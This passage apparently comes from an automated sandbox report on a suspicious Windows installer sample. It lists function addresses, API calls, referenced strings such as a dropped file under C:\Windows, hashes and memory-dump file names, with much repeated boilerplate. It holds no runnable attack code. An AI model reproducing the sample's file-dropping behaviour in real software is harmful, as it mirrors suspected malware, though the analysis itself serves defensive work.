                                                                              • Associated: 0000000B.00000002.442128287.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442138820.0000000000408000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.000000000040A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000422000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000427000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.000000000042C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.000000000042F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000435000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000459000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442182123.000000000045C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442182123.000000000046F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442182123.00000000004A3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_400000_dllhost.jbxd
                                                                              Similarity
                                                                              • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                              • String ID:
                                                                              • API String ID: 2320649405-0
                                                                              • Opcode ID: d93bb5df8f2b76ccefaad0a5d1bb7d3eec77da1dbbaa67d130298efb7d8eee66
                                                                              • Instruction ID: 35b1f235034bf6ed7bc4b251198a1cd7c2be2f7e10ce7e0bcb7d9fbd5291f4f5
                                                                              • Opcode Fuzzy Hash: d93bb5df8f2b76ccefaad0a5d1bb7d3eec77da1dbbaa67d130298efb7d8eee66
                                                                              • Instruction Fuzzy Hash: D7218471600704AFCB219F68DE08B4BBBF8AF41750B04897EFD95E26A0D734D904CB64
                                                                              Function 00402644 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 153fileCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • ReadFile.KERNEL32(?,?,?,?), ref: 004026B0
                                                                              • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 004026EB
                                                                              • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 0040270E
                                                                              • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 00402724
                                                                                • Part of subcall function 00405E1F: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00405E35
                                                                              • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 004027D0
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.442133033.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 0000000B.00000002.442128287.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442138820.0000000000408000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.000000000040A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000422000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000427000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.000000000042C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.000000000042F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000435000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000459000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442182123.000000000045C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442182123.000000000046F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442182123.00000000004A3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_400000_dllhost.jbxd
                                                                              Similarity
                                                                              • API ID: File$Pointer$ByteCharMultiWide$Read
                                                                              • String ID: 9
                                                                              • API String ID: 163830602-2366072709
                                                                              • Opcode ID: efe543eef621af3ce3e1f10678013b5d314bdbd7c9d0a35879e6d8519b0983c6
                                                                              • Instruction ID: e157cda522c6117da55a2477cd969df60feaafed97a1adf3b1f02a042ae2ebc2
                                                                              • Opcode Fuzzy Hash: efe543eef621af3ce3e1f10678013b5d314bdbd7c9d0a35879e6d8519b0983c6
                                                                              • Instruction Fuzzy Hash: 9C51F774D10219ABDF20DFA5DA88AAEB779FF04304F50443BE511B72D1D7B89982CB58
                                                                              Function 00404B7A Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404B95
                                                                              • GetMessagePos.USER32 ref: 00404B9D
                                                                              • ScreenToClient.USER32(?,?), ref: 00404BB7
                                                                              • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404BC9
                                                                              • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404BEF
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.442133033.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 0000000B.00000002.442128287.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442138820.0000000000408000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.000000000040A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000422000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000427000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.000000000042C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.000000000042F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000435000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000459000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442182123.000000000045C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442182123.000000000046F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442182123.00000000004A3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_400000_dllhost.jbxd
                                                                              Similarity
                                                                              • API ID: Message$Send$ClientScreen
                                                                              • String ID: f
                                                                              • API String ID: 41195575-1993550816
                                                                              • Opcode ID: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
                                                                              • Instruction ID: 6d27a89fd112f7dd13df74400405474d9978eabb633620400ae5318118f47dfb
                                                                              • Opcode Fuzzy Hash: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
                                                                              • Instruction Fuzzy Hash: CD015E71900218BADB00DB94DD85FFFBBBCAF95711F10412BBA51B61D0D7B4A9018BA4
                                                                              Function 00401DB3 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetDC.USER32(?), ref: 00401DB6
                                                                              • GetDeviceCaps.GDI32(00000000,0000005A,00000048), ref: 00401DD0
                                                                              • MulDiv.KERNEL32 ref: 00401DD8
                                                                              • ReleaseDC.USER32(?,00000000), ref: 00401DE9
                                                                              • CreateFontIndirectW.GDI32(0040CDB0), ref: 00401E38
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.442133033.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 0000000B.00000002.442128287.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442138820.0000000000408000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.000000000040A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000422000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000427000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.000000000042C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.000000000042F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000435000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000459000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442182123.000000000045C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442182123.000000000046F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442182123.00000000004A3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_400000_dllhost.jbxd
                                                                              Similarity
                                                                              • API ID: CapsCreateDeviceFontIndirectRelease
                                                                              • String ID: Calibri
                                                                              • API String ID: 3808545654-1409258342
                                                                              • Opcode ID: 32b3ac885727d1e190cdd40c39b4cdf091ab3af3085104150676e708dd364a64
                                                                              • Instruction ID: beb1058faab58ab776b37266111e77616320e0f2a6455f46a6b6c1c153f06785
                                                                              • Opcode Fuzzy Hash: 32b3ac885727d1e190cdd40c39b4cdf091ab3af3085104150676e708dd364a64
                                                                              • Instruction Fuzzy Hash: B6015272558241EFE7006BB0AF8AA9A7FB4AB55301F10497EF241B61E2CA7800458B2D
                                                                              Function 00402DD7 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402DF5
                                                                              • MulDiv.KERNEL32 ref: 00402E20
                                                                              • wsprintfW.USER32 ref: 00402E30
                                                                              • SetWindowTextW.USER32(?,?), ref: 00402E40
                                                                              • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402E52
                                                                              Strings
                                                                              • verifying installer: %d%%, xrefs: 00402E2A
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.442133033.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 0000000B.00000002.442128287.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442138820.0000000000408000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.000000000040A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000422000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000427000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.000000000042C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.000000000042F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000435000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000459000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442182123.000000000045C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442182123.000000000046F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442182123.00000000004A3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_400000_dllhost.jbxd
                                                                              Similarity
                                                                              • API ID: Text$ItemTimerWindowwsprintf
                                                                              • String ID: verifying installer: %d%%
                                                                              • API String ID: 1451636040-82062127
                                                                              • Opcode ID: e049c72b028903268a13e0303fe007745629d422319b61ed44a985218b4f833f
                                                                              • Instruction ID: 725db9d4d41e60ee2dd5d311e5346f84fbed97106a71cca60d70b9a4d06edbb5
                                                                              • Opcode Fuzzy Hash: e049c72b028903268a13e0303fe007745629d422319b61ed44a985218b4f833f
                                                                              • Instruction Fuzzy Hash: 73014471640208ABDF209F60DD49FAA3B69EB00708F008039FA05F91D0DBB989558B99
                                                                              Function 004028A7 Relevance: 9.1, APIs: 6, Instructions: 86memoryfileCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 004028FB
                                                                              • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 00402917
                                                                              • GlobalFree.KERNEL32(?), ref: 00402950
                                                                              • GlobalFree.KERNEL32(00000000), ref: 00402963
                                                                              • CloseHandle.KERNEL32(?), ref: 0040297B
                                                                              • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 0040298F
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.442133033.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 0000000B.00000002.442128287.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442138820.0000000000408000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.000000000040A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000422000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000427000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.000000000042C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.000000000042F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000435000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000459000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442182123.000000000045C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442182123.000000000046F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442182123.00000000004A3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_400000_dllhost.jbxd
                                                                              Similarity
                                                                              • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                              • String ID:
                                                                              • API String ID: 2667972263-0
                                                                              • Opcode ID: 794126d87b7ab7f3e2e070d8386bcb8afdde5fae5b7e809f26f6fd9fec4836ff
                                                                              • Instruction ID: c6e800f027f1e1b1e461e4fc783814b3910171fe2b09394c7840a14eb176b3fb
                                                                              • Opcode Fuzzy Hash: 794126d87b7ab7f3e2e070d8386bcb8afdde5fae5b7e809f26f6fd9fec4836ff
                                                                              • Instruction Fuzzy Hash: 9821BFB1D00124BBDF206FA5DE49D9E7E79EF08364F10423AF954762E1CB794C419B98
                                                                              Function 00404A6C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 84stringCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • lstrlenW.KERNEL32(004236E8,004236E8,?,%u.%u%s%s,?,00000000,00000000,?,000000DC,00000000,?,000000DF), ref: 00404B0D
                                                                              • wsprintfW.USER32 ref: 00404B16
                                                                              • SetDlgItemTextW.USER32(?,004236E8), ref: 00404B29
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.442133033.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 0000000B.00000002.442128287.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442138820.0000000000408000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.000000000040A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000422000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000427000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.000000000042C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.000000000042F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000435000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000459000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442182123.000000000045C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442182123.000000000046F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442182123.00000000004A3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_400000_dllhost.jbxd
                                                                              Similarity
                                                                              • API ID: ItemTextlstrlenwsprintf
                                                                              • String ID: %u.%u%s%s$6B
                                                                              • API String ID: 3540041739-3884863406
                                                                              • Opcode ID: 95c3251a73d665659f4e5ef41dc4b3ed63ce9024b19b633afc4b02d7477ffd45
                                                                              • Instruction ID: 5e68f5a3766037a7274f1f000e531c578f4d2f2b22a3e42eca2e55653584bdbe
                                                                              • Opcode Fuzzy Hash: 95c3251a73d665659f4e5ef41dc4b3ed63ce9024b19b633afc4b02d7477ffd45
                                                                              • Instruction Fuzzy Hash: F111D8736481283BDB00656D9C45E9F329CDB81374F150237FE66F61D1D9788C2186EC
                                                                              Function 00402592 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 69stringCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • WideCharToMultiByte.KERNEL32(?,?,sarcoderma,000000FF,C:\Windows\Intragantes.geo,00000400,?,?,00000021), ref: 004025E2
                                                                              • lstrlenA.KERNEL32(C:\Windows\Intragantes.geo,?,?,sarcoderma,000000FF,C:\Windows\Intragantes.geo,00000400,?,?,00000021), ref: 004025ED
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.442133033.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 0000000B.00000002.442128287.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442138820.0000000000408000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.000000000040A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000422000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000427000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.000000000042C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.000000000042F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000435000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000459000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442182123.000000000045C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442182123.000000000046F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442182123.00000000004A3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_400000_dllhost.jbxd
                                                                              Similarity
                                                                              • API ID: ByteCharMultiWidelstrlen
                                                                              • String ID: C:\Windows\Intragantes.geo$sarcoderma
                                                                              • API String ID: 3109718747-3933101654
                                                                              • Opcode ID: 0ec32d5fc753f1a73e59ed2e949e40f7473725568fa61f063b052c02e944df7f
                                                                              • Instruction ID: 514f5b9530cea4d9367e026ee51610d144416164e286c499b2b09fde189c8ffc
                                                                              • Opcode Fuzzy Hash: 0ec32d5fc753f1a73e59ed2e949e40f7473725568fa61f063b052c02e944df7f
                                                                              • Instruction Fuzzy Hash: B8113B32A00200FFDB146FB18E8D99F76649F54345F20843BF502F22C1D9BC49415B5E
                                                                              Function 00401D57 Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetDlgItem.USER32(?,?), ref: 00401D5D
                                                                              • GetClientRect.USER32(00000000,?), ref: 00401D6A
                                                                              • LoadImageW.USER32 ref: 00401D8B
                                                                              • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D99
                                                                              • DeleteObject.GDI32(00000000), ref: 00401DA8
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.442133033.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 0000000B.00000002.442128287.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442138820.0000000000408000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.000000000040A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000422000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000427000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.000000000042C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.000000000042F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000435000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000459000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442182123.000000000045C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442182123.000000000046F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442182123.00000000004A3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_400000_dllhost.jbxd
                                                                              Similarity
                                                                              • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                              • String ID:
                                                                              • API String ID: 1849352358-0
                                                                              • Opcode ID: 2e926fbddc9d53b4849064fbd2325b8602243f9cfaa17b252278c42eeb429d9a
                                                                              • Instruction ID: 477f9c078023e6e9cc07b453b9f7f3a7004dd49873a1bfc78c69f95ea128efdf
                                                                              • Opcode Fuzzy Hash: 2e926fbddc9d53b4849064fbd2325b8602243f9cfaa17b252278c42eeb429d9a
                                                                              • Instruction Fuzzy Hash: CAF0EC72604518AFDB01DBE4DE88CEEB7BCEB08341B14047AF641F61A1CA749D118B78
                                                                              Function 00405B1D Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,0040332A,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,7570D4C4,00403589,?,00000006,00000008,0000000A), ref: 00405B23
                                                                              • CharPrevW.USER32(?,00000000), ref: 00405B2D
                                                                              • lstrcatW.KERNEL32(?,0040A014,?,00000006,00000008,0000000A), ref: 00405B3F
                                                                              Strings
                                                                              • C:\Users\user\AppData\Local\Temp\, xrefs: 00405B1D
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.442133033.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 0000000B.00000002.442128287.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442138820.0000000000408000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.000000000040A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000422000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000427000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.000000000042C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.000000000042F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000435000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000459000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442182123.000000000045C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442182123.000000000046F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442182123.00000000004A3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_400000_dllhost.jbxd
                                                                              Similarity
                                                                              • API ID: CharPrevlstrcatlstrlen
                                                                              • String ID: C:\Users\user\AppData\Local\Temp\
                                                                              • API String ID: 2659869361-4017390910
                                                                              • Opcode ID: 2d89e3346713fcbf25affea4869717dbbf7bb0cb650dc976aff6b925dbbb9e25
                                                                              • Instruction ID: c0ef0cb97c36de63e92d9fca1924244fe31698b984028f6787b43ddfdde79dcc
                                                                              • Opcode Fuzzy Hash: 2d89e3346713fcbf25affea4869717dbbf7bb0cb650dc976aff6b925dbbb9e25
                                                                              • Instruction Fuzzy Hash: 7FD0A731106530AAC1117B548C04DDF72AC9E46344342047FF201B70A1C77C2D6287FD
                                                                              Function 00402E5D Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • DestroyWindow.USER32 ref: 00402E70
                                                                              • GetTickCount.KERNEL32(00000000,0040303D,00000001,?,00000006,00000008,0000000A), ref: 00402E8E
                                                                              • CreateDialogParamW.USER32 ref: 00402EAB
                                                                              • ShowWindow.USER32(00000000,00000005), ref: 00402EB9
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.442133033.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 0000000B.00000002.442128287.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442138820.0000000000408000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.000000000040A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000422000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000427000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.000000000042C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.000000000042F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000435000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000459000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442182123.000000000045C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442182123.000000000046F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442182123.00000000004A3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
